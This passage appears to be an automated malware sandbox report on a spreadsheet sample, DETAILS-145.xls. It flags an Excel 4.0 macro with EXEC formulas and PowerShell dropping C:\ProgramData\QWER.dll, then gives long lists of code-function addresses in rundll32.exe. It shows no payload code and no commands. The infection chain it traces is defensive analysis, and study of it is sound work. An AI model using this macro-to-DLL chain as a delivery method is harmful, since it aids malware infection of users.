"...?......#.,.#.#.0...0.0.\. .".. ".;.\.-.#.,.#.#.0...0.0.\. .".. "...I..."..#.,.#.#.0...0.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0...0.0.\. .".. "...q.*.6.._.-.*. .#.,.#.#.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0.\. .".. "._.-.;._.-.*. .".-.".\. .".. "._.-.;._.-.@._.-...,.).'.._-* #,##0_-;\-* #,##0_-;_-* "-"_-;_-@_-....,.>.._.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;._.-.*. .".-.".?.?.\. .".. "._.-.;._.-.@._.-...4.+./.._-* #,##0.00_-;\-* #,##0.00_-;_-* "-"??_-;_-@_-..?...:.._("$"* #,##0.00_);_("$"* \(#,##0.00\);_("$"* "-"??_);_(@_).......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .....
                            Powershell drops PE file
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\QWER.dllJump to dropped file
                            Found Excel 4.0 Macro with suspicious formulas
                            Source: DETAILS-145.xlsInitial sample: EXEC
                            Source: DETAILS-145.xlsInitial sample: EXEC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100360079_2_10036007
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100410509_2_10041050
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003130F9_2_1003130F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100323E29_2_100323E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100304609_2_10030460
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100415929_2_10041592
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003E59F9_2_1003E59F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003960C9_2_1003960C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100317E29_2_100317E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10040B0E9_2_10040B0E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10031BB69_2_10031BB6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10041C569_2_10041C56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10036CB59_2_10036CB5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1001CD169_2_1001CD16
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10042D219_2_10042D21
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10031FC29_2_10031FC2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001797009_2_00179700
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00185CF99_2_00185CF9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001850409_2_00185040
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0018109E9_2_0018109E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001760839_2_00176083
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001770ED9_2_001770ED
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0017911A9_2_0017911A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0017F1549_2_0017F154
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0018A1569_2_0018A156
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001891869_2_00189186
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001841A79_2_001841A7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0017E2439_2_0017E243
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0018026B9_2_0018026B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0018129C9_2_0018129C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0017C3099_2_0017C309
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0018B3919_2_0018B391
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0018C38F9_2_0018C38F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0018D3C89_2_0018D3C8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0017B41A9_2_0017B41A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0018A4299_2_0018A429
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0018542E9_2_0018542E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0019146E9_2_0019146E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0018E4989_2_0018E498
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001804B89_2_001804B8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001874DD9_2_001874DD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001904DE9_2_001904DE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001864F19_2_001864F1
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001744FA9_2_001744FA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001835129_2_00183512
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0017F58F9_2_0017F58F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001845CD9_2_001845CD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0018561F9_2_0018561F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0018363D9_2_0018363D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001786509_2_00178650
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001936729_2_00193672
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0017472E9_2_0017472E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001827539_2_00182753
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0017777B9_2_0017777B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001728309_2_00172830
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001818319_2_00181831
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0017B8219_2_0017B821
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0017C8509_2_0017C850
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001868649_2_00186864
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0017E86A9_2_0017E86A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001908679_2_00190867
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001768DE9_2_001768DE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0018D8D79_2_0018D8D7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001788F49_2_001788F4
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0017F93D9_2_0017F93D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001719509_2_00171950
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0017194C9_2_0017194C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001809469_2_00180946
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001919939_2_00191993
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0018C9A99_2_0018C9A9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001899AA9_2_001899AA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00176A1F9_2_00176A1F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0017CA439_2_0017CA43
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00179A7D9_2_00179A7D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00191B549_2_00191B54
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00184B569_2_00184B56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0017BB4B9_2_0017BB4B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0017AB669_2_0017AB66
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00177B829_2_00177B82
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00187BCA9_2_00187BCA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0018EBFF9_2_0018EBFF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00182BF69_2_00182BF6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00176C299_2_00176C29
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0017EC9B9_2_0017EC9B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0018CC899_2_0018CC89
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0018ACD39_2_0018ACD3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0017BD0F9_2_0017BD0F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00180D339_2_00180D33
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00190D5B9_2_00190D5B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00183D419_2_00183D41
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00188D719_2_00188D71
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00178D959_2_00178D95
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0017FD8C9_2_0017FD8C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0018EE949_2_0018EE94
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0017AE9A9_2_0017AE9A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0018BE8C9_2_0018BE8C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00176ED69_2_00176ED6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0018FF319_2_0018FF31
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00171F9B9_2_00171F9B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00173FB89_2_00173FB8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00172FA19_2_00172FA1
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0017CFCE9_2_0017CFCE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023BE8C10_2_0023BE8C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023EE9410_2_0023EE94
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022EC9B10_2_0022EC9B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023E49810_2_0023E498
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002270ED10_2_002270ED
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00235CF910_2_00235CF9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002374DD10_2_002374DD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022F93D10_2_0022F93D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022970010_2_00229700
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023351210_2_00233512
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00241B5410_2_00241B54
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023B39110_2_0023B391
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00228D9510_2_00228D95
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022B82110_2_0022B821
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023A42910_2_0023A429
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00226C2910_2_00226C29
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023542E10_2_0023542E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023183110_2_00231831
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022283010_2_00222830
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023363D10_2_0023363D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022B41A10_2_0022B41A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023561F10_2_0023561F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00226A1F10_2_00226A1F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0024086710_2_00240867
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023686410_2_00236864
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022E86A10_2_0022E86A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023026B10_2_0023026B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0024146E10_2_0024146E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0024367210_2_00243672
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00229A7D10_2_00229A7D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022CA4310_2_0022CA43
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022E24310_2_0022E243
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023504010_2_00235040
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022C85010_2_0022C850
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022865010_2_00228650
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002304B810_2_002304B8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022608310_2_00226083
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023CC8910_2_0023CC89
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022AE9A10_2_0022AE9A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023109E10_2_0023109E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023129C10_2_0023129C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002364F110_2_002364F1
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002288F410_2_002288F4
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002244FA10_2_002244FA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023ACD310_2_0023ACD3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00226ED610_2_00226ED6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023D8D710_2_0023D8D7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002404DE10_2_002404DE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002268DE10_2_002268DE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022472E10_2_0022472E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00230D3310_2_00230D33
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023FF3110_2_0023FF31
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022C30910_2_0022C309
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022BD0F10_2_0022BD0F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022911A10_2_0022911A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022AB6610_2_0022AB66
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00238D7110_2_00238D71
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022777B10_2_0022777B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00233D4110_2_00233D41
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023094610_2_00230946
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022BB4B10_2_0022BB4B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022194C10_2_0022194C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023275310_2_00232753
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022195010_2_00221950
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023A15610_2_0023A156
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00234B5610_2_00234B56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022F15410_2_0022F154
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00240D5B10_2_00240D5B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00222FA110_2_00222FA1
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002341A710_2_002341A7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002399AA10_2_002399AA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023C9A910_2_0023C9A9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00223FB810_2_00223FB8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00227B8210_2_00227B82
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023918610_2_00239186
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023C38F10_2_0023C38F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022F58F10_2_0022F58F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022FD8C10_2_0022FD8C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0024199310_2_00241993
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00221F9B10_2_00221F9B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00232BF610_2_00232BF6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023EBFF10_2_0023EBFF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00237BCA10_2_00237BCA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023D3C810_2_0023D3C8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0022CFCE10_2_0022CFCE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002345CD10_2_002345CD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003600711_2_10036007
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1004105011_2_10041050
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003130F11_2_1003130F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_100323E211_2_100323E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003046011_2_10030460
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1004159211_2_10041592
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003E59F11_2_1003E59F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003960C11_2_1003960C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_100317E211_2_100317E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10040B0E11_2_10040B0E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10031BB611_2_10031BB6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10041C5611_2_10041C56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10036CB511_2_10036CB5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1001CD1611_2_1001CD16
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10042D2111_2_10042D21
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10031FC211_2_10031FC2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B970011_2_001B9700
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001C5CF911_2_001C5CF9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001C504011_2_001C5040
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001C109E11_2_001C109E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B608311_2_001B6083
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B70ED11_2_001B70ED
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B911A11_2_001B911A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001CA15611_2_001CA156
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001BF15411_2_001BF154
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001C918611_2_001C9186
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001C41A711_2_001C41A7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001BE24311_2_001BE243
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001C026B11_2_001C026B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001C129C11_2_001C129C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001BC30911_2_001BC309
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001CB39111_2_001CB391
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001CC38F11_2_001CC38F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001CD3C811_2_001CD3C8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001BB41A11_2_001BB41A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001C542E11_2_001C542E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001CA42911_2_001CA429
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001D146E11_2_001D146E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001CE49811_2_001CE498
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001C04B811_2_001C04B8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001C74DD11_2_001C74DD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001D04DE11_2_001D04DE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B44FA11_2_001B44FA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001C64F111_2_001C64F1
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001C351211_2_001C3512
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001BF58F11_2_001BF58F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001C45CD11_2_001C45CD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001C561F11_2_001C561F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001C363D11_2_001C363D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B865011_2_001B8650
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001D367211_2_001D3672
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B472E11_2_001B472E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001C275311_2_001C2753
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B777B11_2_001B777B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B283011_2_001B2830
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001C183111_2_001C1831
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001BB82111_2_001BB821
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001BC85011_2_001BC850
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001BE86A11_2_001BE86A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001C686411_2_001C6864
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001D086711_2_001D0867
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B68DE11_2_001B68DE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001CD8D711_2_001CD8D7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B88F411_2_001B88F4
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001BF93D11_2_001BF93D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B195011_2_001B1950
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B194C11_2_001B194C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001C094611_2_001C0946
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001D199311_2_001D1993
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001CC9A911_2_001CC9A9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001C99AA11_2_001C99AA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B6A1F11_2_001B6A1F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001BCA4311_2_001BCA43
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B9A7D11_2_001B9A7D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001D1B5411_2_001D1B54
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001C4B5611_2_001C4B56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001BBB4B11_2_001BBB4B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001BAB6611_2_001BAB66
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B7B8211_2_001B7B82
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001C7BCA11_2_001C7BCA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001CEBFF11_2_001CEBFF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001C2BF611_2_001C2BF6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B6C2911_2_001B6C29
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001BEC9B11_2_001BEC9B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001CCC8911_2_001CCC89
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001CACD311_2_001CACD3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001BBD0F11_2_001BBD0F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001C0D3311_2_001C0D33
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001D0D5B11_2_001D0D5B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001C3D4111_2_001C3D41
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001C8D7111_2_001C8D71
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B8D9511_2_001B8D95
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001BFD8C11_2_001BFD8C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001BAE9A11_2_001BAE9A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001CEE9411_2_001CEE94
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001CBE8C11_2_001CBE8C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B6ED611_2_001B6ED6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001CFF3111_2_001CFF31
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B1F9B11_2_001B1F9B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B3FB811_2_001B3FB8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001B2FA111_2_001B2FA1
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001BCFCE11_2_001BCFCE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00785CF912_2_00785CF9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007770ED12_2_007770ED
